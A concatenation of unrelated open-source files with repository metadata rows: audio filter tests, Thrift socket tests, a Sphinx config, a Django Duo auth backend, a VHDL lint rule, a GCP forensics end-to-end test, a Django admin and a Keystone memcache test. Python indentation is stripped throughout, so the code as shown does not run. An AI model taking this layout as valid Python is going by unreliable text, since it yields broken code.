compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
#test long stereo fir, mono coeffs
writeaudio(transpose([ref,-ref]))
h = signal.firwin(312, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
#test asymmetric mono fir
writeaudio(ref)
impulse = concatenate(([1], zeros(499)))
b, a = signal.butter(2, 500.0/24000, 'low')
h = signal.lfilter(b, a, impulse)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test asymmetric stereo fir
writeaudio(transpose([ref,-ref]))
impulse = concatenate(([1], zeros(499)))
b, a = signal.butter(2, 500.0/24000, 'low')
h = signal.lfilter(b, a, impulse)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
os.remove('test_coeffs.txt')
def benchmarks():
print "Benchmarking"
ref = (2.0 * random.rand(131072)) - 1.0
h = signal.firwin(8191, 0.4)
expected = signal.lfilter(h, 1, ref)
savetxt("test_coeffs.txt", h)
#fir mono benchmark
writeaudio(ref)
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-5)
#fir stereo benchmark
writeaudio(transpose([ref,-ref]))
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-5)
os.remove('test_coeffs.txt')
#iir stereo benchmark
writeaudio(transpose([ref,-ref]))
b, a = signal.butter(2, 100.0/24000, 'high')
expected = signal.lfilter(b,a,ref*10**(-6.0/20))
os.system("../file-qdsp -n 256 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-5)
def main():
if len(sys.argv) > 1 and sys.argv[1] == "bench":
benchmarks()
else:
test_gain()
test_gate()
test_iir()
test_fir()
os.remove('test_in.wav')
os.remove('test_out.wav')
if __name__ == "__main__":
main()
| gpl-3.0 | -4,635,497,234,165,862,000 | 32.345455 | 111 | 0.622819 | false |
facebook/fbthrift | thrift/lib/py/transport/TSocketTest.py | 1 | 5829 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os.path
import socket
import tempfile
import threading
import time
import unittest
import thrift.transport.TSocket as TSocket
import thrift.transport.TTransport as TTransport
class TSocketTest(unittest.TestCase):
def test_usage_as_context_manager(self):
"""
Asserts that both TSocket and TServerSocket can be used with `with` and
that their resources are disposed of at the close of the `with`.
"""
text = b"hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
self.assertFalse(conn.isOpen())
with server.accept() as client:
read = client.read(len(text))
self.assertFalse(conn.isOpen())
self.assertFalse(server.isListening())
self.assertEquals(read, text)
def test_server_context_errors(self):
# Make sure the TServerSocket context manager doesn't
# swallow exceptions
def do_test():
with TSocket.TServerSocket(port=0, family=socket.AF_INET6):
raise Exception('test_error')
self.assertRaisesRegexp(Exception, 'test_error', do_test)
def test_open_failure(self):
# Bind a server socket to an address, but don't actually listen on it.
server_socket = socket.socket(socket.AF_INET6)
try:
server_socket.bind(('::', 0))
server_port = server_socket.getsockname()[1]
# Explicitly use "localhost" as the hostname, so that the
# connect code will try both IPv6 and IPv4. We want to
# exercise the failure behavior when trying multiple addresses.
sock = TSocket.TSocket(host='localhost', port=server_port)
sock.setTimeout(50) # ms
try:
sock.open()
self.fail('unexpectedly succeeded to connect to closed socket')
except TTransport.TTransportException:
# sock.open() should not leave the file descriptor open
# when it fails
self.assertEquals(None, sock.handle)
self.assertEquals({}, sock.handles)
# Calling close() again on the socket should be a no-op,
# and shouldn't throw an error
sock.close()
finally:
server_socket.close()
def test_poller_process(self):
# Make sure that pollers do not fail when they're given None as timeout
text = "hi" # sample text to send over the wire
with TSocket.TServerSocket(port=0, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
def write_data():
# delay writing to verify that poller.process is waiting
time.sleep(1)
with TSocket.TSocket(host=addr[0], port=addr[1]) as conn:
conn.write(text)
poller = TSocket.ConnectionSelect()
thread = threading.Thread(target=write_data)
thread.start()
for filenos in server.handles.keys():
poller.read(filenos)
r, _, x = poller.process(timeout=None)
thread.join()
# Verify that r is non-empty
self.assertTrue(r)
def test_deprecated_str_form_of_port(self):
# Make sure that the deprecated form of the `port` parameter is
# accepted in TServerSocket and TSocket.
port = "0"
text = b"hi" # sample text to send over the wire
# NB: unfortunately unittest.TestCase.assertWarns isn't available until
# py3.
with TSocket.TServerSocket(port=port, family=socket.AF_INET6) as server:
addr = server.getSocketNames()[0]
with TSocket.TSocket(host=addr[0], port=str(addr[1])) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
def test_bad_port(self):
port = 'bogus'
with self.assertRaises(ValueError):
with TSocket.TServerSocket(port=port):
pass
with self.assertRaises(ValueError):
with TSocket.TSocket(port=port):
pass
def test_unix_socket(self):
text = b"hi" # sample text to send over the wire
with tempfile.NamedTemporaryFile(delete=True) as fh:
unix_socket = fh.name
with TSocket.TServerSocket(unix_socket=unix_socket) as server:
with TSocket.TSocket(unix_socket=unix_socket) as conn:
conn.write(text)
with server.accept() as client:
read = client.read(len(text))
self.assertEquals(read, text)
# The socket will not be cleaned up when the server has been shutdown.
self.assertTrue(os.path.exists(unix_socket))
| apache-2.0 | 3,627,083,272,699,399,700 | 38.924658 | 82 | 0.614857 | false |
hanoverhr/CAF | db/phpm/doc/conf.py | 1 | 9670 | # -*- coding: utf-8 -*-
#
# phpMyAdmin documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 26 14:04:48 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), "_ext")))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['configext']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'phpMyAdmin'
copyright = u'2012 - 2014, The phpMyAdmin devel team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '4.3.1'
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'html', 'doctrees']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'phpMyAdmindoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'phpMyAdmin.tex', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'phpmyadmin', u'phpMyAdmin Documentation',
[u'The phpMyAdmin devel team'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'phpMyAdmin', u'phpMyAdmin Documentation',
u'The phpMyAdmin devel team', 'phpMyAdmin', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'phpMyAdmin'
epub_author = u'The phpMyAdmin devel team'
epub_publisher = u'The phpMyAdmin devel team'
epub_copyright = copyright
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Highlight PHP without starting <?php tag
from sphinx.highlighting import lexers
from pygments.lexers.web import PhpLexer
lexers['php'] = PhpLexer(startinline=True)
| gpl-2.0 | -7,684,980,086,626,668,000 | 30.809211 | 82 | 0.709824 | false |
ptone/django-duo-auth | duo_auth/backends.py | 1 | 1061 | import datetime
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from duo_auth.models import VerificationDetails
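# Configuration sketch (illustrative): to be consulted during login this backend
# must be listed in the Django settings; the dotted path below matches the
# duo_auth package this module ships in.
#   AUTHENTICATION_BACKENDS = ('duo_auth.backends.auth_backend',)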
class auth_backend(ModelBackend):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def authenticate(self, username=None, password=None, passcode=None):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
return None
if not user.check_password(password):
return None
try:
verification_details = user.two_factor_details
except VerificationDetails.DoesNotExist:
# for users that don't have verification details available
# log them in regularly
return user
if passcode == verification_details.challenge_passcode:
verification_details.last_verified = datetime.datetime.utcnow()
verification_details.save()
return user
return None
| mit | -7,481,110,555,969,955,000 | 30.205882 | 75 | 0.66918 | false |
jeremiah-c-leary/vhdl-style-guide | vsg/rules/single_space_between_tokens.py | 1 | 1864 |
from vsg import parser
from vsg import rule
from vsg import violation
from vsg.rules import utils as rules_utils
from vsg.vhdlFile import utils
class single_space_between_tokens(rule.Rule):
'''
Checks for a single space between two tokens.
Parameters
----------
name : string
The group the rule belongs to.
identifier : string
unique identifier. Usually in the form of 00N.
    left_token : token object
       The token on the left of the pair; the rule checks the whitespace between it and right_token.
    right_token : token object
       The token on the right of the pair; the rule checks the whitespace between left_token and this token.
'''
def __init__(self, name, identifier, left_token, right_token):
rule.Rule.__init__(self, name=name, identifier=identifier)
self.solution = None
self.phase = 2
self.left_token = left_token
self.right_token = right_token
def _get_tokens_of_interest(self, oFile):
lToi_a = oFile.get_sequence_of_tokens_matching([self.left_token, parser.whitespace, self.right_token])
lToi_b = oFile.get_sequence_of_tokens_matching([self.left_token, self.right_token])
return utils.combine_two_token_class_lists(lToi_a, lToi_b)
def _analyze(self, lToi):
for oToi in lToi:
lTokens = oToi.get_tokens()
if len(lTokens) == 2:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
elif len(lTokens[1].get_value()) != 1:
self.add_violation(violation.New(oToi.get_line_number(), oToi, self.solution))
def _fix_violation(self, oViolation):
lTokens = oViolation.get_tokens()
if isinstance(lTokens[1], parser.whitespace):
lTokens[1].set_value(' ')
else:
rules_utils.insert_whitespace(lTokens, 1)
oViolation.set_tokens(lTokens)
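# Subclassing sketch (illustrative; the rule name, identifier and token classes
# are placeholders, not taken from this repository): a concrete rule supplies
# only the pair of tokens whose spacing it enforces.
#   class rule_023(single_space_between_tokens):
#       def __init__(self):
#           single_space_between_tokens.__init__(
#               self, 'process', '023',
#               token.process_keyword, token.open_paren)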
| gpl-3.0 | 8,277,113,610,826,553,000 | 30.59322 | 110 | 0.637876 | false |
log2timeline/dftimewolf | tests/lib/collectors/gcloud_e2e.py | 1 | 10759 | # -*- coding: utf-8 -*-
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""End to end test for the Google Cloud Collector."""
import json
import logging
import os
import time
import unittest
from googleapiclient.errors import HttpError
from libcloudforensics.providers.gcp.internal import project as gcp_project
from libcloudforensics.providers.gcp.internal import compute, common
from dftimewolf import config
from dftimewolf.lib import state
from dftimewolf.lib.collectors import gcloud
from dftimewolf.lib.containers import containers
log = logging.getLogger(__name__)
class EndToEndTest(unittest.TestCase):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
       snapshot of the boot disk (by default) or of the disk passed as a
       parameter to the collector's SetUp method (disk_names).
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
       analysis purposes and attach the disk copy to it.
To run this test, add your project information to a project_info.json file:
{
"project_id": "xxx", # required
"instance": "xxx", # required
"disk": "xxx", # optional
"zone": "xxx" # required
}
Export a PROJECT_INFO environment variable with the absolute path to your
file: "user@terminal:~$ export PROJECT_INFO='absolute/path/project_info.json'"
"""
def __init__(self, *args, **kwargs):
super(EndToEndTest, self).__init__(*args, **kwargs)
try:
project_info = ReadProjectInfo()
except (OSError, RuntimeError, ValueError) as exception:
self.error_msg = str(exception)
return
self.project_id = project_info['project_id']
self.instance_to_analyse = project_info['instance']
# Optional: test a disk other than the boot disk
self.disk_to_forensic = project_info.get('disk', None)
self.zone = project_info['zone']
self.gcp_client = common.GoogleCloudComputeClient(
project_id=self.project_id)
def setUp(self):
if hasattr(self, 'error_msg'):
raise unittest.SkipTest(self.error_msg)
self.incident_id = 'fake-incident-id'
self.test_state = state.DFTimewolfState(config.Config)
self.gcloud_collector = gcloud.GoogleCloudCollector(self.test_state)
def test_end_to_end_boot_disk(self):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
snapshot of the boot disk.
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
       analysis purposes and attach the boot disk copy to it.
"""
# Setting up the collector to make a copy of the boot disk only
self.gcloud_collector.SetUp(
self.project_id,
self.project_id,
self.incident_id,
self.zone,
True,
42.0,
'pd-standard',
16,
remote_instance_name=self.instance_to_analyse,
# disk_names=None by default, boot disk will be copied
)
# Attach the boot disk copy to the analysis VM
self.gcloud_collector.Process()
# The forensic instance should be live in the analysis GCP project and
# the disk should be attached
forensics_vms = self.test_state.GetContainers(containers.ForensicsVM)
analysis_vm = forensics_vms[0]
analysis_vm_name = analysis_vm.name
expected_disk_name = analysis_vm.evidence_disk.name
gce_instances_client = self.gcp_client.GceApi().instances()
request = gce_instances_client.get(
project=self.project_id,
zone=self.zone,
instance=analysis_vm_name)
response = request.execute()
self.assertEqual(response['name'], analysis_vm_name)
for disk in response['disks']:
if disk['source'].split("/")[-1] == expected_disk_name:
return
self.fail('Error: could not find the disk {0:s} in instance {1:s}'.format(
expected_disk_name, analysis_vm_name
))
def test_end_to_end_other_disk(self):
"""End to end test on GCP for the gcloud.py collector.
This end-to-end test runs directly on GCP and tests that:
1. The gcloud.py collector connects to the target instance and makes a
snapshot of the disk passed to the 'disk_names' parameter in the
SetUp() method.
2. A new disk is created from the taken snapshot.
3. If an analysis VM already exists, the module will attach the disk
copy to the VM. Otherwise, it will create a new GCP instance for
       analysis purposes and attach the disk copy to it.
"""
    # This should make a copy of the disk specified in 'disk_names'
self.gcloud_collector.SetUp(
self.project_id,
self.project_id,
self.incident_id,
self.zone,
True,
42.0,
'pd-standard',
16,
remote_instance_name=self.instance_to_analyse,
disk_names=self.disk_to_forensic
)
# Attach the disk_to_forensic copy to the analysis VM
self.gcloud_collector.Process()
# The forensic instance should be live in the analysis GCP project and
# the disk should be attached
forensics_vms = self.test_state.GetContainers(containers.ForensicsVM)
analysis_vm = forensics_vms[0]
analysis_vm_name = analysis_vm.name
expected_disk_name = analysis_vm.evidence_disk.name
gce_instances_client = self.gcp_client.GceApi().instances()
request = gce_instances_client.get(
project=self.project_id,
zone=self.zone,
instance=analysis_vm_name)
response = request.execute()
self.assertEqual(response['name'], analysis_vm_name)
for disk in response['disks']:
if disk['source'].split("/")[-1] == expected_disk_name:
return
self.fail('Error: could not find the disk {0:s} in instance {1:s}'.format(
expected_disk_name, analysis_vm_name
))
def tearDown(self):
CleanUp(self.project_id, self.zone, self.gcloud_collector.analysis_vm.name)
def ReadProjectInfo():
"""Read project information to run e2e test.
Returns:
dict: A dict with the project information.
Raises:
OSError: if the file cannot be found, opened or closed.
RuntimeError: if the json file cannot be parsed.
ValueError: if the json file does not have the required properties.
"""
project_info = os.environ.get('PROJECT_INFO')
if project_info is None:
raise OSError('Error: please make sure that you defined the '
'"PROJECT_INFO" environment variable pointing '
'to your project settings.')
try:
json_file = open(project_info)
try:
project_info = json.load(json_file)
except ValueError as exception:
raise RuntimeError('Error: cannot parse JSON file. {0:s}'.format(
          str(exception))) from exception
json_file.close()
except OSError as exception:
raise OSError('Error: could not open/close file {0:s}: {1:s}'.format(
project_info, str(exception)
    )) from exception
if not all(key in project_info for key in ['project_id', 'instance',
'zone']):
raise ValueError('Error: please make sure that your JSON file '
'has the required entries. The file should '
'contain at least the following: ["project_id", '
'"instance", "zone"].')
return project_info
def CleanUp(project_id, zone, instance_name):
"""Clean up GCP project.
Remove the instance [instance_name] in the GCP project [project_id] and its
disks that were created as part of the end to end test.
Attributes:
project_id (str): the project id of the GCP project.
zone (str): the zone for the project.
instance_name (str): the name of the analysis VM to remove.
"""
gcp_client = common.GoogleCloudComputeClient(project_id=project_id)
project = gcp_project.GoogleCloudProject(project_id, zone)
disks = compute.GoogleComputeInstance(
project.project_id, zone, instance_name).ListDisks()
# delete the created forensics VMs
log.info('Deleting analysis instance: {0:s}.'.format(instance_name))
gce_instances_client = gcp_client.GceApi().instances()
request = gce_instances_client.delete(
project=project.project_id,
zone=project.default_zone,
instance=instance_name
)
try:
request.execute()
except HttpError:
# GceOperation triggers a while(True) loop that checks on the
# operation ID. Sometimes it loops one more time right when the
    # operation has finished and thus the associated ID doesn't exist
# anymore, throwing an HttpError. We can ignore this.
pass
log.info('Instance {0:s} successfully deleted.'.format(instance_name))
# delete the copied disks
# we ignore the disk that was created for the analysis VM (disks[0]) as
# it is deleted in the previous operation
gce_disks_client = gcp_client.GceApi().disks()
for disk in list(disks.keys())[1:]:
log.info('Deleting disk: {0:s}.'.format(disk))
while True:
try:
request = gce_disks_client.delete(
project=project.project_id,
zone=project.default_zone,
disk=disk
)
request.execute()
break
except HttpError as exception:
# GceApi() will throw a 400 error until the analysis VM deletion is
# correctly propagated. When the disk is finally deleted, it will
# throw a 404 not found if it looped again after deletion.
if exception.resp.status == 404:
break
if exception.resp.status != 400:
log.warning('Could not delete the disk {0:s}: {1:s}'.format(
disk, str(exception)
))
# Throttle the requests to one every 10 seconds
time.sleep(10)
log.info('Disk {0:s} successfully deleted.'.format(
disk))
if __name__ == '__main__':
unittest.main()
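# Illustrative invocation (an assumption, not part of the test module): with a
# project_info.json as documented in the class docstring, the suite could be
# run roughly like this; the unittest module path mirrors this file's location.
#
#   $ export PROJECT_INFO=/absolute/path/project_info.json
#   $ python -m unittest tests.lib.collectors.gcloud_e2e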
| apache-2.0 | -8,741,836,277,264,749,000 | 35.471186 | 80 | 0.67404 | false |
yunojuno/elasticsearch-django | elasticsearch_django/admin.py | 1 | 3501 | import logging
import simplejson as json # simplejson supports Decimal serialization
from django.contrib import admin
from django.template.defaultfilters import truncatechars, truncatewords
from django.utils.safestring import mark_safe
from .models import SearchQuery
logger = logging.getLogger(__name__)
def pprint(data: dict) -> str:
"""
Return an indented HTML pretty-print version of JSON.
Take the event_payload JSON, indent it, order the keys and then
present it as a <code> block. That's about as good as we can get
until someone builds a custom syntax function.
"""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
    html = pretty.replace(" ", "&nbsp;").replace("\n", "<br>")
return mark_safe("<code>%s</code>" % html)
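# Illustrative example (not part of the original module): with the indent and
# separators used above, pprint({"b": 1, "a": 2}) sorts the keys and returns
# roughly '<code>{<br>&nbsp;&nbsp;&nbsp;&nbsp;"a":&nbsp;2,<br>&nbsp;&nbsp;&nbsp;&nbsp;"b":&nbsp;1<br>}</code>',
# i.e. every space replaced by &nbsp; and every newline by <br>.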
class SearchQueryAdmin(admin.ModelAdmin):
list_display = (
"id",
"user",
"search_terms_display",
"total_hits_display",
"returned_",
"min_",
"max_",
"reference",
"executed_at",
)
list_filter = ("index", "query_type")
search_fields = ("search_terms", "user__first_name", "user__last_name", "reference")
# excluding because we are using a pretty version instead
exclude = ("hits", "aggregations", "query", "page", "total_hits_")
readonly_fields = (
"user",
"index",
"search_terms",
"query_type",
"total_hits",
"total_hits_relation",
"returned_",
"min_",
"max_",
"duration",
"query_",
"hits_",
"aggregations_",
"executed_at",
)
def search_terms_display(self, instance: SearchQuery) -> str:
"""Return truncated version of search_terms."""
raw = instance.search_terms
# take first five words, and further truncate to 50 chars if necessary
return truncatechars(truncatewords(raw, 5), 50)
def query_(self, instance: SearchQuery) -> str:
"""Return pretty version of query JSON."""
return pprint(instance.query)
def max_(self, instance: SearchQuery) -> str:
"""Return pretty version of max_score."""
return "-" if instance.page_size == 0 else str(instance.max_score)
max_.short_description = "Max score" # type: ignore
def min_(self, instance: SearchQuery) -> str:
"""Return pretty version of min_score."""
return "-" if instance.page_size == 0 else str(instance.min_score)
min_.short_description = "Min score" # type: ignore
def total_hits_display(self, instance: SearchQuery) -> str:
"""Return total hit count, annotated if lower bound."""
if instance.total_hits_relation == SearchQuery.TotalHitsRelation.ESTIMATE:
return f"{instance.total_hits}*"
return f"{instance.total_hits}"
def returned_(self, instance: SearchQuery) -> str:
"""Return number of hits returned in the page."""
if instance.page_size == 0:
return "-"
return "%i - %i" % (instance.page_from, instance.page_to)
returned_.short_description = "Page returned" # type: ignore
def hits_(self, instance: SearchQuery) -> str:
"""Return pretty version of hits JSON."""
return pprint(instance.hits)
def aggregations_(self, instance: SearchQuery) -> str:
"""Return pretty version of aggregations JSON."""
return pprint(instance.aggregations)
admin.site.register(SearchQuery, SearchQueryAdmin)
| mit | -1,682,509,719,301,585,000 | 32.028302 | 88 | 0.619823 | false |
sileht/deb-openstack-keystone | tests/test_backend_memcache.py | 1 | 2348 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
import uuid
import memcache
from keystone import exception
from keystone import test
from keystone.token.backends import memcache as token_memcache
import test_backend
class MemcacheClient(object):
"""Replicates a tiny subset of memcached client interface."""
def __init__(self, *args, **kwargs):
"""Ignores the passed in args."""
self.cache = {}
def check_key(self, key):
if not isinstance(key, str):
raise memcache.Client.MemcachedStringEncodingError()
def get(self, key):
"""Retrieves the value for a key or None."""
self.check_key(key)
obj = self.cache.get(key)
now = time.mktime(datetime.datetime.utcnow().timetuple())
if obj and (obj[1] == 0 or obj[1] > now):
return obj[0]
else:
raise exception.TokenNotFound(token_id=key)
def set(self, key, value, time=0):
"""Sets the value for a key."""
self.check_key(key)
self.cache[key] = (value, time)
return True
def delete(self, key):
self.check_key(key)
try:
del self.cache[key]
except KeyError:
#NOTE(bcwaldon): python-memcached always returns the same value
pass
class MemcacheToken(test.TestCase, test_backend.TokenTests):
def setUp(self):
super(MemcacheToken, self).setUp()
fake_client = MemcacheClient()
self.token_api = token_memcache.Token(client=fake_client)
def test_get_unicode(self):
token_id = unicode(uuid.uuid4().hex)
data = {'id': token_id, 'a': 'b'}
self.token_api.create_token(token_id, data)
self.token_api.get_token(token_id)
| apache-2.0 | -7,747,823,600,834,229,000 | 29.894737 | 75 | 0.654174 | false |
kubaszostak/gdal-dragndrop | osgeo/apps/Python27/Lib/platform.py | 1 | 53234 | #!/usr/bin/env python
""" This module tries to retrieve as much platform-identifying data as
possible. It makes this information available via function APIs.
If called from the command line, it prints the platform
information concatenated as single string to stdout. The output
format is useable as part of a filename.
"""
# This module is maintained by Marc-Andre Lemburg <[email protected]>.
# If you find problems, please submit bug reports/patches via the
# Python bug tracker (http://bugs.python.org) and assign them to "lemburg".
#
# Note: Please keep this module compatible to Python 1.5.2.
#
# Still needed:
# * more support for WinCE
# * support for MS-DOS (PythonDX ?)
# * support for Amiga and other still unsupported platforms running Python
# * support for additional Linux distributions
#
# Many thanks to all those who helped adding platform-specific
# checks (in no particular order):
#
